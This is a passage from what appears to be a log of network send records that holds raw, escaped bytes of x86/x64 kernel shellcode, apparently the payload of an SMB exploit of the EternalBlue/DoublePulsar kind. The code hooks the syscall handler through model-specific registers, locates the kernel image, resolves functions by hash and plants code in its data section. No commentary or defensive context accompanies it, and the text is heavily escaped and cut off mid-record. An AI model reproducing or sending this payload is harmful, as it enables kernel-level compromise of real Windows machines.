b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 21, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\